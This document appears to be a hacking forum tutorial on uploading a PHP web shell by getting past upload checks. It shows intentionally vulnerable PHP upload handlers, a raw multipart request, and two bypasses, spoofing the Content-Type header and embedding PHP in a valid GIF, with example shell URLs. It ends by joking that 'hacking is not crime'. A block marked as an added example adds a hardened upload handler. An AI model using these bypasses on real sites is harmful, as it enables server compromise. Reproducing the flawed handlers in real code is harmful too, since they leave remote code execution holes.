HOW TO UPLOAD A WEBSHELL AND BYPASS SECURITY, PART 1




 

I'll explain how upload checks get bypassed to upload a shell.
Say you've already opened a website that has a place to upload documents or images.

The code below is the basic HTML for a file upload.

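<!-- enctype is required for the file to be sent; the field name matches $_FILES['userfile'] in upload.php -->
<form name="upload" action="upload.php" method="post" enctype="multipart/form-data">
   upload a file : <input type="file" name="userfile">
   <input type="submit" name="upload">
</form>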


From here a shell can be uploaded directly.


CONTENT TYPE VERIFICATION
Usually this kind of check sits in upload.php, so that plain text files and PHP files will not upload.


<?php
// Checks whether the file is a GIF or not, using the type sent by the client
if ($_FILES['userfile']['type'] != "image/gif")
{
    echo "Sorry, we only allow uploading GIF images";
    exit;
}
$uploaddir = 'uploads/';
// The file name supplied by the client is kept, extension included
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile))
{
    echo "File is valid, and was successfully uploaded.\n";
}
else
{
    echo "File uploading failed.\n";
}
?>


The code above checks whether the file is a GIF or not.



"
   POST /upload2.php HTTP/1.1
   TE: deflate,gzip;q=0.3
   Connection: TE, close
   Host: localhost
   User-Agent: libwww-perl/5.803
   Content-Type: multipart/form-data; boundary=xYzZY
   Content-Length: 156

   --xYzZY
   Content-Disposition: form-data; name="userfile"; filename="shell.php"
   Content-Type: text/plain 

"

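The code checks the file. If it is not a GIF, the file will not be uploaded. The request above declares Content-Type: text/plain for shell.php, so it is rejected.

Now we can bypass this protection using a program such as Perl or a form data tamper plugin in Firefox,
because the type the code compares is just the Content-Type value the client put in the request.

Example:
"Content-Type" => "image/gif"
This makes the file upload, and you can access it at

http://www.contoh.com/uploads/shell.php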

IMAGE CONTENT VERIFICATION
This type checks the content of the uploaded file, to see whether it contains a script or not.

Code:


<?php
// getimagesize() reads the image header and reports its dimensions and MIME type
$imageinfo = getimagesize($_FILES['userfile']['tmp_name']);
if ($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg')
{
    echo "Sorry, we only accept GIF and JPEG images\n";
    exit;
}
$uploaddir = 'uploads/';
// The file name supplied by the client is kept, extension included
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
    echo "File is valid, and was successfully uploaded.\n";
} else {
    echo "File uploading failed.\n";
}
?>




In the code above, the PHP function getimagesize() returns the size and the image type.

Now, to bypass this type you can use a program such as
GIMP to embed a PHP script in the binary data of the image file.
When it is uploaded, the file you look at really is a valid image, but the PHP interpreter sees
that the file has a PHP script inside it.
So even though we use the php extension for the shell, as long as there is no file name verification in the process,
the file will upload as a GIF or image.

Example:
http://www.contoh.com/upload/shell.gif
will show a correct image file (even though a shell is embedded in the image data)

and
http://www.contoh.com/upload/shell.php
will bring up the shell (uploaded simply as a php file)
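
For comparison, an upload handler that closes both gaps described above. This is an added example, not code from the original post: it ignores the client's Content-Type and file name, picks the extension itself, and re-encodes the image. The function name store_upload() and the directory /var/app-data/uploads are assumptions, and the fileinfo and GD extensions are assumed to be enabled.

```php
<?php
declare(strict_types=1);

// Hypothetical helper: validates one entry of $_FILES and stores it safely.
function store_upload(array $file, string $destDir): string
{
    // Content-derived MIME type => extension chosen by the server.
    $allowed = ['image/gif' => 'gif', 'image/jpeg' => 'jpg'];

    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Upload failed.');
    }

    // $file['type'] and $file['name'] come from the request and are ignored.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset($allowed[$mime])) {
        throw new RuntimeException('Only GIF and JPEG images are accepted.');
    }

    // Decode and re-encode with GD so only pixel data is kept; bytes appended
    // to the image or hidden in comment fields are not copied over.
    $data = file_get_contents($file['tmp_name']);
    $img = $data === false ? false : @imagecreatefromstring($data);
    if ($img === false) {
        throw new RuntimeException('File is not a decodable image.');
    }

    // Random server-side name: the client controls neither name nor
    // extension, so the stored file cannot end in .php.
    $target = rtrim($destDir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $ok = $mime === 'image/gif' ? imagegif($img, $target) : imagejpeg($img, $target, 90);
    if (!$ok) {
        throw new RuntimeException('Could not store image.');
    }
    return $target;
}

// Assumed path outside the document root, so nothing stored there is executed.
if (isset($_FILES['userfile'])) {
    try {
        store_upload($_FILES['userfile'], '/var/app-data/uploads');
        echo "File is valid, and was successfully uploaded.\n";
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo $e->getMessage(), "\n";
    }
}
```

The server-chosen extension and the storage location outside the web root are what stop an uploaded file from being run as PHP; the re-encoding step is an extra layer on top. GD keeps only the first frame of an animated GIF.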

That's it for now.. to be continued later..
hacking is not crime..
hahaha